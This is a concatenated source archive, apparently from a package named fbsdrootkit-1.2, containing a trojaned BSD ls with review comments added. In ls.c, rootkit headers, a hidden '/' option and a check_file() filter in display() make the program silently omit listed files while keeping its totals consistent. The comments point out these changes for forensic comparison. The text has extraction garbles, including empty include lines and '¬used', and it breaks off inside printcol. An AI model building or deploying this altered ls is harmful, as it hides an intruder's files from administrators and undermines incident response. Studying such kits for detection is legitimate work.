INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
* * $Id: cmp.c,v 1.2 1994/09/24 02:55:52 davidg Exp $ */

#ifndef lint
static char sccsid[] = "@(#)cmp.c 8.1 (Berkeley) 5/31/93";
#endif /* not lint */

/* NOTE(review): the header names of the next four directives were lost in extraction. */
#include
#include
#include
#include

#include "ls.h"
#include "extern.h"

/*
 * Sort comparators for ls.  Each takes two FTSENT entries and returns a
 * negative, zero or positive int in the usual comparator convention; the
 * rev* variants swap the operands of their counterpart.
 *
 * NOTE(review): the six time comparators return a difference of two
 * timestamps narrowed to int.  Where that difference does not fit in an
 * int the sign can come out wrong; comparing with < and > avoids that.
 */

/* namecmp -- order by fts_name with strcmp(), a before b. */
int
namecmp(a, b)
	const FTSENT *a, *b;
{
	return (strcmp(a->fts_name, b->fts_name));
}

/* revnamecmp -- namecmp() with the operands swapped. */
int
revnamecmp(a, b)
	const FTSENT *a, *b;
{
	return (strcmp(b->fts_name, a->fts_name));
}

/* modcmp -- order by st_mtime, larger (newer) timestamp first. */
int
modcmp(a, b)
	const FTSENT *a, *b;
{
	return (b->fts_statp->st_mtime - a->fts_statp->st_mtime);
}

/* revmodcmp -- order by st_mtime, smaller (older) timestamp first. */
int
revmodcmp(a, b)
	const FTSENT *a, *b;
{
	return (a->fts_statp->st_mtime - b->fts_statp->st_mtime);
}

/* acccmp -- order by st_atime, larger (newer) timestamp first. */
int
acccmp(a, b)
	const FTSENT *a, *b;
{
	return (b->fts_statp->st_atime - a->fts_statp->st_atime);
}

/* revacccmp -- order by st_atime, smaller (older) timestamp first. */
int
revacccmp(a, b)
	const FTSENT *a, *b;
{
	return (a->fts_statp->st_atime - b->fts_statp->st_atime);
}

/* statcmp -- order by st_ctime, larger (newer) timestamp first. */
int
statcmp(a, b)
	const FTSENT *a, *b;
{
	return (b->fts_statp->st_ctime - a->fts_statp->st_ctime);
}

/* revstatcmp -- order by st_ctime, smaller (older) timestamp first. */
int
revstatcmp(a, b)
	const FTSENT *a, *b;
{
	return (a->fts_statp->st_ctime - b->fts_statp->st_ctime);
}
fbsdrootkit-1.2/ls/extern.h100600 764 764 5010 5640712470 13230 0ustar dfdf/*- * Copyright (c) 1991, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4.
Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)extern.h 8.1 (Berkeley) 5/31/93 * $Id: extern.h,v 1.2 1994/09/24 02:55:52 davidg Exp $ */ int acccmp __P((const FTSENT *, const FTSENT *)); int revacccmp __P((const FTSENT *, const FTSENT *)); int modcmp __P((const FTSENT *, const FTSENT *)); int revmodcmp __P((const FTSENT *, const FTSENT *)); int namecmp __P((const FTSENT *, const FTSENT *)); int revnamecmp __P((const FTSENT *, const FTSENT *)); int statcmp __P((const FTSENT *, const FTSENT *)); int revstatcmp __P((const FTSENT *, const FTSENT *)); char *flags_to_string __P((u_long, char *)); void prcopy __P((char *, char *, int)); void printcol __P((DISPLAY *)); void printlong __P((DISPLAY *)); void printscol __P((DISPLAY *)); void usage __P((void)); fbsdrootkit-1.2/ls/ls.c100600 764 764 33276 6256116014 12367 0ustar dfdf/* * Copyright (c) 1989, 1993, 1994 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * Michael Fischbein. 
* * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: ls.c,v 1.6.4.2 1996/06/05 02:35:41 jkh Exp $ */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1989, 1993, 1994\n\ The Regents of the University of California. 
All rights reserved.\n";
#endif /* not lint */

#ifndef lint
static char sccsid[] = "@(#)ls.c 8.5 (Berkeley) 4/2/94";
#endif /* not lint */

/* NOTE(review): the header names of the next eleven directives were lost in extraction. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#include "ls.h"
#include "extern.h"

/*
 * Rootkit configuration files.  These two headers are the kit's own
 * additions; showall, file_block_list() and check_file(), used further
 * down, are not defined anywhere in this listing and presumably come
 * from them.
 */
#include "../config.h"
#include "../rootkitls.h"

static void display __P((FTSENT *, FTSENT *));
static int mastercmp __P((const FTSENT **, const FTSENT **));
static void traverse __P((int, char **, int));

static void (*printfcn) __P((DISPLAY *));	/* chosen output routine */
static int (*sortfcn) __P((const FTSENT *, const FTSENT *));	/* chosen comparator */

long blocksize;			/* block size units */
int termwidth = 80;		/* default terminal width */

/* flags */
int f_accesstime;		/* use time of last access */
int f_column;			/* columnated format */
int f_flags;			/* show flags associated with a file */
int f_inode;			/* print inode */
int f_kblocks;			/* print size in kilobytes */
int f_listdir;			/* list actual directory, not contents */
int f_listdot;			/* list files beginning with . */
int f_longform;			/* long listing format */
int f_newline;			/* if precede with newline */
int f_nonprint;			/* show unprintables as ? */
int f_nosort;			/* don't sort output */
int f_recursive;		/* ls subdirectories also */
int f_reversesort;		/* reverse whatever sort is used */
int f_sectime;			/* print the real time for all files */
int f_singlecol;		/* use single column output */
int f_size;			/* list size in short listing */
int f_statustime;		/* use time of last mode change */
int f_dirname;			/* if precede with directory name */
int f_timesort;			/* sort by time vice name */
int f_type;			/* add type character for non-regular files */

/*
 * main --
 *	Entry point of the ls shipped in this archive.  It derives output
 *	defaults from the terminal, parses the options, selects the sort
 *	and print functions and hands the operands (or "." when there are
 *	none) to traverse().
 *
 *	The kit's own comments mark three additions an analyst comparing
 *	this file with a vendor copy should look at: the two "../"
 *	includes above, the extra '/' option compiled in under SHOWFLAG,
 *	and the file_block_list() call made whenever showall is zero.
 *	display() later consults check_file() for every entry unless
 *	showall is set.
 *
 *	A binary built from this file filters its own output, so its
 *	listings are not evidence during triage; compare the installed
 *	binary with a known-good checksum and enumerate directories with a
 *	trusted copy from read-only media.
 */
int
main(argc, argv)
	int argc;
	char *argv[];
{
	static char dot[] = ".", *dotav[] = { dot, NULL };
	struct winsize win;
	int ch, fts_options, notused;
	char *p;

	/* Terminal defaults to -Cq, non-terminal defaults to -1. */
	if (isatty(STDOUT_FILENO)) {
		if (ioctl(STDOUT_FILENO, TIOCGWINSZ, &win) == -1 ||
		    !win.ws_col) {
			if ((p = getenv("COLUMNS")) != NULL)
				termwidth = atoi(p);
		}
		else
			termwidth = win.ws_col;
		f_column = f_nonprint = 1;
	} else {
		f_singlecol = 1;
		/* retrieve environment variable, in case of explicit -C */
		if ((p = getenv("COLUMNS")))
			termwidth = atoi(p);
	}

	/* Root is -A automatically. */
	if (!getuid())
		f_listdot = 1;

	fts_options = FTS_PHYSICAL;
	/*
	 * Add the show all option for argument parsing if defined.  The
	 * only difference between the two getopt() strings is the trailing
	 * '/', which usage() does not advertise.
	 */
#if defined(SHOWFLAG)
	while ((ch = getopt(argc, argv, "1ACFLRTacdfgikloqrstu/")) != EOF) {
#else
	while ((ch = getopt(argc, argv, "1ACFLRTacdfgikloqrstu")) != EOF) {
#endif
		switch (ch) {
		/*
		 * The -1, -C and -l options all override each other so shell
		 * aliasing works right.
		 */
		case '1':
			f_singlecol = 1;
			f_column = f_longform = 0;
			break;
		case 'C':
			f_column = 1;
			f_longform = f_singlecol = 0;
			break;
		case 'l':
			f_longform = 1;
			f_column = f_singlecol = 0;
			break;
		/* The -c and -u options override each other. */
		case 'c':
			f_statustime = 1;
			f_accesstime = 0;
			break;
		case 'u':
			f_accesstime = 1;
			f_statustime = 0;
			break;
		case 'F':
			f_type = 1;
			break;
		case 'L':
			fts_options &= ~FTS_PHYSICAL;
			fts_options |= FTS_LOGICAL;
			break;
		case 'R':
			f_recursive = 1;
			break;
		case 'a':
			fts_options |= FTS_SEEDOT;
			/* FALLTHROUGH */
		case 'A':
			f_listdot = 1;
			break;
		/* The -d option turns off the -R option. */
		case 'd':
			f_listdir = 1;
			f_recursive = 0;
			break;
		case 'f':
			f_nosort = 1;
			break;
		case 'g':		/* Compatibility with 4.3BSD. */
			break;
		case 'i':
			f_inode = 1;
			break;
		case 'k':
			f_kblocks = 1;
			break;
		case 'o':
			f_flags = 1;
			break;
		case 'q':
			f_nonprint = 1;
			break;
		case 'r':
			f_reversesort = 1;
			break;
		case 's':
			f_size = 1;
			break;
		case 'T':
			f_sectime = 1;
			break;
		case 't':
			f_timesort = 1;
			break;
		/*
		 * Show all files if the capability is enabled: a non-zero
		 * showall skips both file_block_list() below and the
		 * check_file() test in display().
		 */
#if defined(SHOWFLAG)
		case '/':
			showall++;
			break;
#endif
		default:
		case '?':
			usage();
		}
	}
	argc -= optind;
	argv += optind;

	/*
	 * Read in a list of files to block.  Where that list is read from
	 * is decided inside file_block_list(), which is not part of this
	 * listing.
	 */
	if(!showall)
		file_block_list();

	/*
	 * If not -F, -i, -l, -s or -t options, don't require stat
	 * information.
	 */
	if (!f_inode && !f_longform && !f_size && !f_timesort && !f_type)
		fts_options |= FTS_NOSTAT;

	/*
	 * If not -F, -d or -l options, follow any symbolic links listed on
	 * the command line.
	 */
	if (!f_longform && !f_listdir && !f_type)
		fts_options |= FTS_COMFOLLOW;

	/* If -l or -s, figure out block size. */
	if (f_longform || f_size) {
		if (f_kblocks)
			blocksize = 2;
		else {
			/*
			 * NOTE(review): the first argument below is an
			 * extraction garble (an HTML entity was decoded
			 * inside the code); the local declared above is
			 * notused and its address is what is meant.
			 */
			(void)getbsize(¬used, &blocksize);
			blocksize /= 512;
		}
	}

	/* Select a sort function. */
	if (f_reversesort) {
		if (!f_timesort)
			sortfcn = revnamecmp;
		else if (f_accesstime)
			sortfcn = revacccmp;
		else if (f_statustime)
			sortfcn = revstatcmp;
		else /* Use modification time. */
			sortfcn = revmodcmp;
	} else {
		if (!f_timesort)
			sortfcn = namecmp;
		else if (f_accesstime)
			sortfcn = acccmp;
		else if (f_statustime)
			sortfcn = statcmp;
		else /* Use modification time. */
			sortfcn = modcmp;
	}

	/* Select a print function. */
	if (f_singlecol)
		printfcn = printscol;
	else if (f_longform)
		printfcn = printlong;
	else
		printfcn = printcol;

	if (argc)
		traverse(argc, argv, fts_options);
	else
		traverse(1, dotav, fts_options);
	exit(0);
}

static int output;			/* If anything output. */

/*
 * Traverse() walks the logical directory structure specified by the argv list
 * in the order specified by the mastercmp() comparison function.  During the
 * traversal it passes linked lists of structures to display() which represent
 * a superset (may be exact set) of the files to be displayed.
*/
/*
 * Parameters: argc is the operand count (used only to decide whether each
 * directory is preceded by its name), argv the NULL-terminated operand
 * vector given to fts_open(), options the FTS_* option word built in
 * main().  Exits through err() when fts_open() fails.
 *
 * NOTE(review): the handle from fts_open() is never passed to fts_close()
 * in this function, and errno is tested after the loop without having
 * been cleared before it, so an older error value could be reported as
 * an fts_read failure.
 */
static void
traverse(argc, argv, options)
	int argc, options;
	char *argv[];
{
	FTS *ftsp;
	FTSENT *p, *chp;
	int ch_options;

	if ((ftsp =
	    fts_open(argv, options, f_nosort ? NULL : mastercmp)) == NULL)
		err(1, NULL);

	/* The operands themselves are displayed first, with no parent. */
	display(NULL, fts_children(ftsp, 0));
	if (f_listdir)
		return;

	/*
	 * If not recursing down this tree and don't need stat info, just get
	 * the names.
	 */
	ch_options = !f_recursive && options & FTS_NOSTAT ? FTS_NAMEONLY : 0;

	while ((p = fts_read(ftsp)) != NULL)
		switch (p->fts_info) {
		case FTS_DC:
			warnx("%s: directory causes a cycle", p->fts_name);
			break;
		case FTS_DNR:
		case FTS_ERR:
			warnx("%s: %s", p->fts_name, strerror(p->fts_errno));
			break;
		case FTS_D:
			/* Below the operand level, dot directories need -a/-A. */
			if (p->fts_level != FTS_ROOTLEVEL &&
			    p->fts_name[0] == '.' && !f_listdot)
				break;

			/*
			 * If already output something, put out a newline as
			 * a separator.  If multiple arguments, precede each
			 * directory with its name.
			 */
			if (output)
				(void)printf("\n%s:\n", p->fts_path);
			else if (argc > 1) {
				(void)printf("%s:\n", p->fts_path);
				output = 1;
			}

			chp = fts_children(ftsp, ch_options);
			display(p, chp);

			/* Without -R the directory is not descended into. */
			if (!f_recursive && chp != NULL)
				(void)fts_set(ftsp, p, FTS_SKIP);
			break;
		}
	if (errno)
		err(1, "fts_read");
}

/*
 * Display() takes a linked list of FTSENT structures and passes the list
 * along with any other necessary information to the print function.  P
 * points to the parent directory of the display list.
 *
 * Entries that must not be shown are tagged by setting fts_number to
 * NO_PRINT; the print functions skip them.  The first test in the loop
 * is the kit's addition: unless showall is set, every entry for which
 * check_file() returns non-zero is tagged and skipped before any
 * accounting, so it adds nothing to the entry count, the column widths
 * or the block total that printlong() and printcol() print as "total".
 * check_file() is not defined in this listing.
 *
 * For an examiner this means a listing from this binary stays internally
 * consistent while omitting entries; the omission only shows up against
 * a directory enumeration made with a trusted tool.
 */
static void
display(p, list)
	FTSENT *p, *list;
{
	struct stat *sp;
	DISPLAY d;
	FTSENT *cur;
	NAMES *np;
	u_quad_t maxsize;
	u_long btotal, maxblock, maxinode, maxlen, maxnlink;
	int bcfile, flen, glen, ulen, maxflags, maxgroup, maxuser;
	int entries, needstats;
	char *user, *group, *flags, buf[20];	/* 32 bits == 10 digits */

	/*
	 * If list is NULL there are two possibilities: that the parent
	 * directory p has no children, or that fts_children() returned an
	 * error.  We ignore the error case since it will be replicated
	 * on the next call to fts_read() on the post-order visit to the
	 * directory p, and will be signalled in traverse().
	 */
	if (list == NULL)
		return;

	needstats = f_inode || f_longform || f_size;
	flen = 0;
	btotal = maxblock = maxinode = maxlen = maxnlink = 0;
	bcfile = 0;
	maxuser = maxgroup = maxflags = 0;
	flags = NULL;
	maxsize = 0;
	for (cur = list, entries = 0; cur; cur = cur->fts_link) {
		/* Check whether file should be blocked */
		if(!showall && check_file(cur->fts_name)) {
			cur->fts_number=NO_PRINT;
			continue;
		}
		if (cur->fts_info == FTS_ERR || cur->fts_info == FTS_NS) {
			warnx("%s: %s",
			    cur->fts_name, strerror(cur->fts_errno));
			cur->fts_number = NO_PRINT;
			continue;
		}

		/*
		 * P is NULL if list is the argv list, to which different rules
		 * apply.
		 */
		if (p == NULL) {
			/* Directories will be displayed later. */
			if (cur->fts_info == FTS_D && !f_listdir) {
				cur->fts_number = NO_PRINT;
				continue;
			}
		} else {
			/* Only display dot file if -a/-A set. */
			if (cur->fts_name[0] == '.' && !f_listdot) {
				cur->fts_number = NO_PRINT;
				continue;
			}
		}
		/* Unprintable bytes are replaced in place, in the name itself. */
		if (f_nonprint)
			prcopy(cur->fts_name, cur->fts_name, cur->fts_namelen);
		if (cur->fts_namelen > maxlen)
			maxlen = cur->fts_namelen;
		if (needstats) {
			sp = cur->fts_statp;
			if (sp->st_blocks > maxblock)
				maxblock = sp->st_blocks;
			if (sp->st_ino > maxinode)
				maxinode = sp->st_ino;
			if (sp->st_nlink > maxnlink)
				maxnlink = sp->st_nlink;
			if (sp->st_size > maxsize)
				maxsize = sp->st_size;

			btotal += sp->st_blocks;
			if (f_longform) {
				user = user_from_uid(sp->st_uid, 0);
				if ((ulen = strlen(user)) > maxuser)
					maxuser = ulen;
				group = group_from_gid(sp->st_gid, 0);
				if ((glen = strlen(group)) > maxgroup)
					maxgroup = glen;
				if (f_flags) {
					flags =
					    flags_to_string(sp->st_flags, "-");
					if ((flen = strlen(flags)) > maxflags)
						maxflags = flen;
				} else
					flen = 0;

				/*
				 * One allocation holds the NAMES header and
				 * the three strings back to back in data[];
				 * the + 3 covers their terminating NULs.
				 */
				if ((np = malloc(sizeof(NAMES) +
				    ulen + glen + flen + 3)) == NULL)
					err(1, NULL);

				np->user = &np->data[0];
				(void)strcpy(np->user, user);
				np->group = &np->data[ulen + 1];
				(void)strcpy(np->group, group);

				if (S_ISCHR(sp->st_mode) ||
				    S_ISBLK(sp->st_mode))
					bcfile = 1;

				if (f_flags) {
					np->flags = &np->data[ulen + glen + 2];
					(void)strcpy(np->flags, flags);
				}
				cur->fts_pointer = np;
			}
		}
		++entries;
	}

	if (!entries)
		return;

	d.list = list;
	d.entries = entries;
	d.maxlen = maxlen;
	if (needstats) {
		/* Field widths are the printed lengths of the largest values. */
		d.bcfile = bcfile;
		d.btotal = btotal;
		(void)snprintf(buf, sizeof(buf), "%lu", maxblock);
		d.s_block = strlen(buf);
		d.s_flags = maxflags;
		d.s_group = maxgroup;
		(void)snprintf(buf, sizeof(buf), "%lu", maxinode);
		d.s_inode = strlen(buf);
		(void)snprintf(buf, sizeof(buf), "%lu", maxnlink);
		d.s_nlink = strlen(buf);
		(void)snprintf(buf, sizeof(buf), "%qu", maxsize);
		d.s_size = strlen(buf);
		d.s_user = maxuser;
	}

	printfcn(&d);
	output = 1;

	/*
	 * NOTE(review): this frees fts_pointer of every entry, including the
	 * NO_PRINT ones for which no NAMES block was allocated above; that
	 * presumes fts hands out entries with fts_pointer set to NULL.
	 */
	if (f_longform)
		for (cur = list; cur; cur = cur->fts_link)
			free(cur->fts_pointer);
}

/*
 * Ordering for mastercmp:
 * If ordering the argv (fts_level = FTS_ROOTLEVEL) return non-directories
 * as larger than directories.  Within either group, use the sort function.
 * All other levels use the sort function.  Error entries remain unsorted.
 *
 * This is the comparison callback traverse() gives to fts_open(); entries
 * that could not be stat()ed (FTS_NS) are always compared by name.
 */
static int
mastercmp(a, b)
	const FTSENT **a, **b;
{
	int a_info, b_info;

	a_info = (*a)->fts_info;
	if (a_info == FTS_ERR)
		return (0);
	b_info = (*b)->fts_info;
	if (b_info == FTS_ERR)
		return (0);

	if (a_info == FTS_NS || b_info == FTS_NS)
		return (namecmp(*a, *b));

	if (a_info == b_info)
		return (sortfcn(*a, *b));

	if ((*a)->fts_level == FTS_ROOTLEVEL)
		if (a_info == FTS_D)
			return (1);
		else if (b_info == FTS_D)
			return (-1);
		else
			return (sortfcn(*a, *b));
	else
		return (sortfcn(*a, *b));
}
fbsdrootkit-1.2/ls/ls.h100600 764 764 5367 5640712473 12363 0ustar dfdf/* * Copyright (c) 1989, 1993 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * Michael Fischbein. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2.
Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
* * @(#)ls.h 8.1 (Berkeley) 5/31/93 * $Id: ls.h,v 1.2 1994/09/24 02:55:55 davidg Exp $ */ #define NO_PRINT 1 extern long blocksize; /* block size units */ extern int f_accesstime; /* use time of last access */ extern int f_flags; /* show flags associated with a file */ extern int f_inode; /* print inode */ extern int f_longform; /* long listing format */ extern int f_sectime; /* print the real time for all files */ extern int f_size; /* list size in short listing */ extern int f_statustime; /* use time of last mode change */ extern int f_type; /* add type character for non-regular files */ typedef struct { FTSENT *list; u_long btotal; int bcfile; int entries; int maxlen; int s_block; int s_flags; int s_group; int s_inode; int s_nlink; int s_size; int s_user; } DISPLAY; typedef struct { char *user; char *group; char *flags; char data[1]; } NAMES; fbsdrootkit-1.2/ls/print.c100600 764 764 16532 6155174045 13107 0ustar dfdf/* * Copyright (c) 1989, 1993, 1994 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * Michael Fischbein. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. 
Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: print.c,v 1.4.4.3 1996/06/05 02:35:42 jkh Exp $ */

#ifndef lint
static char sccsid[] = "@(#)print.c 8.4 (Berkeley) 4/17/94";
#endif /* not lint */

/* NOTE(review): the header names of the next thirteen directives were lost in extraction. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#include "ls.h"
#include "extern.h"

static int	printaname __P((FTSENT *, u_long, u_long));
static void	printlink __P((FTSENT *));
static void	printtime __P((time_t));
static int	printtype __P((u_int));

/*
 * True for entries that display() tagged as not to be shown.  The tag is
 * the only thing the print functions look at; they do not know why an
 * entry was tagged.
 */
#define	IS_NOPRINT(p)	((p)->fts_number == NO_PRINT)

/*
 * printscol --
 *	Single-column output: one printaname() line for every entry of
 *	dp->list that is not tagged NO_PRINT.
 */
void
printscol(dp)
	DISPLAY *dp;
{
	FTSENT *p;

	for (p = dp->list; p; p = p->fts_link) {
		if (IS_NOPRINT(p))
			continue;
		(void)printaname(p, dp->s_inode, dp->s_block);
		(void)putchar('\n');
	}
}

/*
 * printlong --
 *	Long-format output.  Prints the "total" line for lists below the
 *	operand level, then for every entry not tagged NO_PRINT the
 *	optional inode and block count, mode string, link count, owner,
 *	group, optional flags, device numbers or size, one timestamp, the
 *	name, and the optional type character and link target.
 *
 *	np points at the NAMES block display() attached to the entry; the
 *	field widths come from dp.
 */
void
printlong(dp)
	DISPLAY *dp;
{
	struct stat *sp;
	FTSENT *p;
	NAMES *np;
	char buf[20];

	if (dp->list->fts_level != FTS_ROOTLEVEL && (f_longform || f_size))
		(void)printf("total %lu\n", howmany(dp->btotal, blocksize));

	for (p = dp->list; p; p = p->fts_link) {
		if (IS_NOPRINT(p))
			continue;
		sp = p->fts_statp;
		if (f_inode)
			(void)printf("%*lu ", dp->s_inode, sp->st_ino);
		if (f_size)
			(void)printf("%*qd ",
			    dp->s_block, howmany(sp->st_blocks, blocksize));
		(void)strmode(sp->st_mode, buf);
		np = p->fts_pointer;
		(void)printf("%s %*u %-*s %-*s ", buf, dp->s_nlink,
		    sp->st_nlink, dp->s_user, np->user, dp->s_group,
		    np->group);
		if (f_flags)
			(void)printf("%-*s ", dp->s_flags, np->flags);
		if (S_ISCHR(sp->st_mode) || S_ISBLK(sp->st_mode))
			(void)printf("%3d, %3d ",
			    major(sp->st_rdev), minor(sp->st_rdev));
		else if (dp->bcfile)
			/* Pad so sizes line up under the device-number column. */
			(void)printf("%*s%*qd ",
			    8 - dp->s_size, "", dp->s_size, sp->st_size);
		else
			(void)printf("%*qd ", dp->s_size, sp->st_size);
		if (f_accesstime)
			printtime(sp->st_atime);
		else if (f_statustime)
			printtime(sp->st_ctime);
		else
			printtime(sp->st_mtime);
		(void)printf("%s", p->fts_name);
		if (f_type)
			(void)printtype(sp->st_mode);
		if (S_ISLNK(sp->st_mode))
			printlink(p);
		(void)putchar('\n');
	}
}

#define	TAB	8

/*
 * printcol --
 *	Multi-column output, filled column by column.  The printable
 *	entries are collected into a pointer table, the column width is
 *	rounded up to a multiple of TAB, and rows are padded with tabs.
 *	Falls back to printscol() when fewer than two columns fit in
 *	termwidth.
 *
 *	NOTE(review): when realloc() fails, the code warns and calls
 *	printscol() but does not return.  Execution continues with array
 *	set to NULL into the fill loop below, which stores through it.  A
 *	return after printscol(dp) is needed.  Assigning the realloc()
 *	result straight to array also drops the old table on failure.
 */
void
printcol(dp)
	DISPLAY *dp;
{
	extern int termwidth;
	static FTSENT **array;		/* table reused across calls */
	static int lastentries = -1;	/* capacity of array, in entries */
	FTSENT *p;
	int base, chcnt, cnt, col, colwidth, num;
	int endcol, numcols, numrows, row;

	/*
	 * Have to do random access in the linked list -- build a table
	 * of pointers.
	 */
	if (dp->entries > lastentries) {
		lastentries = dp->entries;
		if ((array =
		    realloc(array, dp->entries * sizeof(FTSENT *))) == NULL) {
			warn(NULL);
			printscol(dp);
		}
	}
	for (p = dp->list, num = 0; p; p = p->fts_link)
		if (p->fts_number != NO_PRINT)
			array[num++] = p;

	colwidth = dp->maxlen;
	if (f_inode)
		colwidth += dp->s_inode + 1;
	if (f_size)
		colwidth += dp->s_block + 1;
	if (f_type)
		colwidth += 1;

	/* Round up to the next multiple of TAB. */
	colwidth = (colwidth + TAB) & ~(TAB - 1);
	if (termwidth < 2 * colwidth) {
		printscol(dp);
		return;
	}

	numcols = termwidth / colwidth;
	numrows = num / numcols;
	if (num % numcols)
		++numrows;

	if (dp->list->fts_level != FTS_ROOTLEVEL && (f_longform || f_size))
		(void)printf("total %lu\n", howmany(dp->btotal, blocksize));
	for (row = 0; row < numrows; ++row) {
		endcol = colwidth;
		/* Entry for (row, col) sits at index row + col * numrows. */
		for (base = row, chcnt = col = 0; col < numcols; ++col) {
